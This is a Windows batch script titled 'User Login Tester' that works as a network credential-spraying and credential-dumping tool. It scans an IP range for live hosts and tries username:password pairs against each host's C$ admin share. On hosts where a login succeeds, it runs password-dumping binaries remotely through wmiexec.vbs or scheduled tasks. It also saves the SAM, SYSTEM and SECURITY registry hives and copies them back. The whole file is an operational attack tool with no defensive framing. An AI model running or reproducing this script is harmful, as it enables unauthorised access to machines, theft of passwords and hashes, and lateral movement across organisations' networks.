@echo off
rem AllInOne.bat -i 192.168.1.1-255 -u file.txt -o output.txt

:start
if "%1" == "" goto :usage
call :check-dependency 32.exe
call :check-dependency 64.exe
rem call :check-dependency srvinfo.exe
rem call :check-dependency users.exe
call :check-dependency wmiexec.vbs
set /a a=0
for %%a in (%*) do set /a a+=1
if %a% lss 6 goto :usage  rem total arguments number
set TempFile=tmp.txt
del %TempFile%  rem clear tmp file
if "%1" == "-s" goto :file-list

rem convert ip range to ip list file
:ip-range
setlocal ENABLEDELAYEDEXPANSION
for /f "tokens=1,2 delims=-" %%i in ("%2") do (
	set StartIP=%%i
	set EndIP=%%j )
for /f "tokens=1-4 delims=." %%i in ("!StartIP!") do (
	set ipa=%%i
	set ipb=%%j
	set ipc=%%k
	set ipd=%%l )
for /l %%i in (!ipd!,1,!EndIP!) do (
	echo !ipa!.!ipb!.!ipc!.%%i >> !TempFile! )
setlocal DISABLEDELAYEDEXPANSION
goto :main

:file-list
copy %2 %TempFile% /Y

:main
if "%7" == "-d" ( set domain=%8) else ( set domain=%%i)
for /f %%i in (%TempFile%) do (
	ping %%i -n 1 >nul
	if not errorlevel 1 (
		echo    %%i alive
		echo %%i >>alive.txt
		call :exploit %%i %domain% %4 %6
	) else ( echo %%i down )
)
goto :end

:check-dependency
rem filename
rem    %1
if not exist %1 (
	echo %1 DOES NOT EXIST!)
exit /b 0

:exploit
rem  server domain userfile  outfile
rem    %1    %2      %3        %4
for /F "tokens=1,2 delims=:" %%u in (%3) do (
	echo net use b: \\%1\c$ "%%v" /user:"%2\%%u"
	net use b: \\%1\c$ "%%v" /user:"%2\%%u"
	if not errorlevel 1 (
		echo    net use succeed
		echo =============== %1 =============== >> %4 
		echo user:%%u  pass:%%v >>%4 & echo.>>%4
		if exist "b:\Program Files (x86)" (
			call :getPass %1 64 "%2\%%u" "%%v"
		) else (
			rem 32.exe can't run on WIN2000
			if not exist "b:\WINNT" (call :getPass %1 32 "%2\%%u" "%%v")
		)
		rem no reg.exe exist on WIN2000 
		if not exist "b:\WINNT" (call :getReg %1 getreg "%2\%%u" "%%v")
		dir b:\ /a >>%4
		if exist "b:\Users" (
			echo    exist users
			dir b:\Users /a >> %4
		) else ( if exist "b:\Docume~1" (
			echo    exist documents and settings
			dir b:\Docume~1 /a >> %4 )
		)
		echo.>>%4& echo.>> %4 
		if exist srvinfo.exe (
			srvinfo.exe -s \\%1 >>%4
			echo.>>%4& echo.>> %4 )
		if exist users.exe (
			users.exe %1 >>%4 )
		echo.>> %4 & echo.>> %4 & echo.>> %4 & echo.>> %4 & echo.>> %4 
		net use b: /del
		exit /b 0
	) else ( echo    net use failed )
)
exit /b 0

:getPass
rem echo server  prog-num  domain-user  pass
rem echo   %1       %2         %3        %4
echo dump plaintext password
copy %2.exe b:\
cscript /nologo wmiexec.vbs /cmd %1 %3 %4 "c:\%2.exe -wait5000" >%1-pass.txt
if %errorlevel% neq 0 (
	echo wmiexec failed, try schtasks
	echo c:\%2.exe ^> c:\%1-pass.txt >b:\%2.bat
	schtasks /create /s %1 /u %3 /p %4 /ru "" /sc DAILY /tn getpass  /tr c:\%2.bat /F
	rem schtasks /query  /s %1 /u %3 /p %4
	schtasks /run  	 /s %1 /u %3 /p %4 /i /tn getpass
	ping 1.1.1.1 -w 5000 -n 1 >nul
	schtasks /delete /s %1 /u %3 /p %4 /f /tn getpass
	move /Y b:\%1-pass.txt %1-pass.txt
	del b:\%2.bat
)
del b:\%2.exe
exit /b 0

:getReg
rem echo server  bat-name  domain-user  pass
rem echo   %1       %2       %3          %4
echo dump reg file
echo reg save hklm\sam c:\%1-sam.hive >b:\%2.bat
echo reg save hklm\system c:\%1-system.hive >>b:\%2.bat
echo reg save hklm\security c:\%1-security.hive >>b:\%2.bat
echo cscript /nologo wmiexec.vbs /cmd %1 %3 %4 "c:\%2.bat -wait5000"
cscript /nologo wmiexec.vbs /cmd %1 %3 %4 "c:\%2.bat -wait5000"
if %errorlevel% neq 0 (
	echo wmiexec failed, try schtasks
	schtasks /create /s %1 /u %3 /p %4 /ru "" /sc DAILY /tn getreg  /tr c:\%2.bat /F
	rem schtasks /query  /s %1 /u %3 /p %4
	schtasks /run  	 /s %1 /u %3 /p %4 /i /tn getreg
	ping 1.1.1.1 -w 5000 -n 1 >nul
	schtasks /delete /s %1 /u %3 /p %4 /f /tn getreg
)
move /Y b:\*.hive
del b:\%2.bat
exit /b 0

:usage
echo.
echo    User Login Tester by. Twi1ight@T00ls.Net
echo    LoginTester.bat [-s file ^| -i ip-addr] -u file -o output.txt [-d domain]
echo 	-s	server list file
echo 	-i	ip address range, such as "192.168.1.7-254"
echo 	-u	username and password file, separated by character :
echo 	-o	output file
echo 	-d	domain name if exists
echo 	32.exe 64.exe srvinfo.exe users.exe wmiexec.vbs
echo.
goto :eof

:end
del %TempFile%
endlocal